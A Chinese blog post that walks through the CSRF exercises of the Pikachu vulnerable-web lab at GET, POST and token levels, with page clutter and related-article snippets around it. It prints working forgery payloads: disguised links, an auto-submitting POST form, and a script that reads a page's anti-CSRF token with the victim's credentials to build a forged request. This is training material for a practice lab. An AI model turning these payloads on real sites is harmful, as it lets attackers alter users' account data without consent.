w28pikachu-csrf实例

最新推荐文章于 2024-06-14 11:17:39 发布
最新推荐文章于 2024-06-14 11:17:39 发布
阅读量362 收藏 6
点赞数 3
文章标签: csrf android 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zxcz123123421/article/details/136141573
版权

pikachu-csrf实例

get级别

这里需要同时修改性别、手机、住址、邮箱。
在这里插入图片描述
写一个简单的html文件,里面伪装修改密码的文字,代码如下:

<html>
    <body>
        <a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">
            pikachu-csrf-get
        </a>
    </body>
</html>

在这里插入图片描述
点击"pikachu-csrf-get"文字后,跳转到pikachu的csrf(get)界面,展示修改后的界面。

在这里插入图片描述

post级别

这里post请求,需要通过表单提交。
写一个简单的html文件,里面伪装修改密码的文字,代码如下:

<html>
    <body>
        <a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">
            pikachu-csrf-get
        </a>
    </br>
    <form method="post" action="http://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.php">
        <input id="sex" type="text" name="sex" value="5" />
        <input id="phonenum" type="text" name="phonenum" value="5" />
        <input id="add" type="text" name="add" value="5" />
        <input id="email" type="text" name="email" value="5" />
        <input id="postsubmit" type="submit" name="submit" value="pikachu-csrf-post" />
    </form>
    </body>
    
</html>

在这里插入图片描述

点击"pikachu-csrf-post"文字后,跳转到pikachu的csrf(post)界面,展示修改后的界面。
在这里插入图片描述

token级别

这里get请求+token。
写一个简单的html文件,里面get请求拼接token,代码如下:

<html>
    <body>
        <a href="http://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex=3&phonenum=2&add=2&email=3&submit=submit">
            pikachu-csrf-get
        </a>
    </br>
    <form method="post" action="http://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.php">
        <input id="sex" type="text" name="sex" value="5" />
        <input id="phonenum" type="text" name="phonenum" value="5" />
        <input id="add" type="text" name="add" value="5" />
        <input id="email" type="text" name="email" value="5" />
        <input id="postsubmit" type="submit" name="submit" value="pikachu-csrf-post" />
    </form>
    </br>
    <a  href="javascript:void(0);" onclick="initJS()">
        pikachu-csrf-token
    </a>
    </body>
    <script >
        function initJS(){
            
            var theUrl = 'http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php';
            if(window.XMLHttpRequest) {
                xmlhttp = new XMLHttpRequest();
            }else{
                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
            }
            var count = 0;
            xmlhttp.withCredentials = true;
            xmlhttp.onreadystatechange=function(){
                if(xmlhttp.readyState ==4 && xmlhttp.status==200)
                {
                    var text = xmlhttp.responseText;

                    // 创建一个临时的 div 元素,并将 HTML 字符串设置为其 innerHTML  
                    var tempDiv = document.createElement('div');  
                    tempDiv.innerHTML = text;  
                    
                    // 从临时 div 中查找具有 name 属性为 "token" 的输入元素  
                    var tokenInput = tempDiv.querySelector('input[name="token"]');  
            
                    var token = tokenInput.value;  
                    console.log('Token Value:', token); // 在控制台输出 token 的值 
                    console.log('count',count);
                    var new_url = 'http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php?sex=7&phonenum=7&add=7&email=7&token='+token+'&submit=submit';
                    console.log('newurl',new_url);        
                }
            };
            xmlhttp.open("GET",theUrl,false);
            xmlhttp.send();
        }
    </script>
    
</html>

在这里插入图片描述
点击"pikachu-csrf-token"文字后,在控制台中查看newurl,并复制下来输入到浏览器中。
在这里插入图片描述
在这里插入图片描述
刷新csrf token,展示了修改后的信息。
在这里插入图片描述
破解成功

杭城我最帅
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu-CSRF(跨站请求伪造)
a1245678899的博客
11-10 567
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。点击修改个人信息然后使用burpsuite抓包可以看到这个数据的传输过程是get型,数据包含在URL之中直接在URL之中构造包含自己信息的网址,伪造一下,诱导用户去点击。当链接被点击以后,可以看到信息已经被修改。
pikachu-master.zip
06-25
Pikachu,这是一个综合类型的靶场练习环境,覆盖了较为全面的漏洞练习,在掌握漏洞原理后,可以通过该靶场来进一步强化自己的知识技能。
pikachu-CSRF
weixin_44477223的博客
11-11 268
1. CSRF-跨站请求伪造 1.1 什么是CSRF Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。 很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。 这里列举一个场景解释一下,希望能够帮助你理解。 场景需求: 小黑想要修
pikachu-CSRF通关教程
m0_71518346的博客
12-09 585
概念:也被称为“One Click Attack”或者“Session Riding”,通过伪装来自受信任用户的请求来攻击受信任的网站。
pikachu-csrf
qq_43660551的博客
04-25 118
登录vince/123456,点修改个人信息,地址栏看不到url,用bp抓包,直接在url中修改Vince的信息,将修改过的url:xxxxxxxx/pikachu/vul/csrf/csrfget/csrf_get_edit.php?攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。CSRF与XSS的区别:CSRF是借用户的权限完成攻击,攻击者并没有拿到用户的权限,而XSS是直接盗取到了用户的权限,然后实施破坏。三、CSRF(TOKEN)
【web-ctf】ctf-pikachu-CSRF
一个努力生活的人的博客
06-29 1029
ctf-pikachu-csrf
pikachu(皮卡丘)--CSRF
m0_74871683的博客
09-16 264
简要概述为1、我们判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。2、本质是借用户的权限完成攻击,因此攻击成功需要用户已经通过验证获得了权限,并触发了攻击者提供的请求。3、网站如果要防止CSRF攻击,则需要对敏感信息的操作实施对应的安全措施,防止这些操作出现被伪造的情况,从而导致CSRF。比如:--对敏感信息的操作增加安全的token;--对敏感信息的操作增加安全的验证码;
pikachu--CSRF & SSRF
weixin_44769042的博客
09-10 304
1.CSRF Cross-Site Request Forgery 跨站请求伪造 y原理 :当我们打开或登录某个网站,浏览器与网站所存放的服务器会产生一个会话,之后一段时间,所有通过这个认证会话的请求,都会被视为可信的动作,比如此时你正登录网上银行,正在转账,此时攻击者构造恶意转账代码,当你不小心点击它时,就会完成相应的转账操作,因为此时浏览器认为这是可信的正常操作。 在pikachu上验证: (1)攻击场景(GET) 点击修改信息,用burpsuite抓包,...
Pikachu-----CSRF(跨站请求伪造)
m0_65712192的博客
12-19 1332
Pikachu-----CSRF(跨站请求伪造)
Pikachu-CSRF
baynk的博客
11-18 1259
0x00 CSRF概述 如果知道CSRF的就可以不用看了,这篇一点技术含量都没。。。纯属为了保证阵型才写。 CSRF(跨站请求伪造)概述 Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。...
pikachu-master
05-04
pikachu漏洞测试平台搭建
pikachu-interpreter:神秘的编程语言“皮卡丘”的解释器
05-09
可以在找到名为“ pikachu”的深奥编程语言的定义安装$ git clone https://github.com/joelsmithjohnson/pikachu-interpreter$ cd pikachu-interpreter$ python setup.py install用法从命令行。 导航到您的Pikachu...
pikachu-xss.txt
06-10
pikachu-xss
csrf与xss差别 别在弄乱了 直接靶场实操pikachucsrf题 token绕过可以吗???
helloKittywz的博客
06-09 1408
我们现在来说说这2个之间的关系,因为昨天的我也没有弄清楚这2者的关系,总感觉迷迷糊糊的。xss这个漏洞是大家并不怎么陌生,导致xss漏洞的产生是服务器没有对用户提交数据过滤不严格,导致浏览器把用户输入的当作js代码返回客户端进行执行,这样就导致了攻击。xss(跨站脚本攻击)可以说简单一点前端js代码可以干什么我们就可以干什么,我们可以获取到用户的cookie,获取键盘记录,钓鱼等等的操作我们来说说csrf这个漏洞csrf(跨站请求伪造)这个是利用用户的。
Java中如何调用mysql中函数
codedadi的博客
06-10 716
前端直接调用 MySQL 中的函数是不直接可能的,因为前端(如 JavaScript 在浏览器中)没有直接访问数据库的能力。请注意,安全性是这种交互中的一个重要考虑因素。确保你的后端 API 是安全的,并验证所有传入的请求和参数以防止潜在的安全风险,如 SQL 注入攻击。设置CallableStatement的参数(如果需要):如果你的函数需要参数,使用CallableStatement的setXXX方法来设置它们。在你的后端服务中,编写一个 API 端点,该端点调用 MySQL 数据库中的函数。
PHP中的while循环:用法、技巧与最佳实践
最新发布
NatLindsay的博客
06-14 292
在PHP编程中,while循环是一种基本且常用的控制结构,用于重复执行代码块,直到指定条件为假。while循环在处理未知迭代次数的任务时特别有用,例如读取文件内容、处理用户输入或动态生成数据等。与for循环不同,while循环适用于那些无法预先确定循环次数的情境。,只要条件为真,循环体内的代码就会被一遍又一遍地执行。理解和灵活运用while循环,可以帮助开发者更高效地处理重复性任务,提高代码的可读性和维护性。
【MySQL】服务器配置和管理
p_fly的博客
06-09 763
MySQL服务器通常说的是mysqld程序。mysqld 是 MySQL 数据库服务器的核心程序,负责处理客户端的请求、管理数据库和执行数据库操作。管理员可以通过配置文件和各种工具来管理和监控 mysqld 服务器的运行本文将介绍下面三个内容:服务器启动选项:可以在命令行和配置文件中指定,用于配置服务器的行为和特性。服务器系统变量:反映了启动选项的当前状态和值,其中一些变量可以在服务器运行时修改。服务器状态变量:包含了关于运行时操作的计数器和统计信息。
XXE漏洞修补:保护您的系统免受XML外部实体攻击
weixin_43822401的博客
06-14 237
XXE漏洞通常发生在解析XML文档时,如果允许引用外部实体,攻击者可以构造特殊的XML输入,导致应用程序读取或包含恶意文件或URL。这不仅可能泄露敏感信息,还可能被用于进一步的攻击。XXE漏洞是一个严重的安全问题,它威胁着Web应用程序和服务器的安全。通过本文介绍的修补策略,包括升级libxml版本、在代码层禁用外部实体解析以及过滤用户提交的XML数据,可以有效地减少XXE漏洞的风险。网络安全是一个持续的过程,需要系统管理员和开发者不断更新知识和技能,以应对不断变化的威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值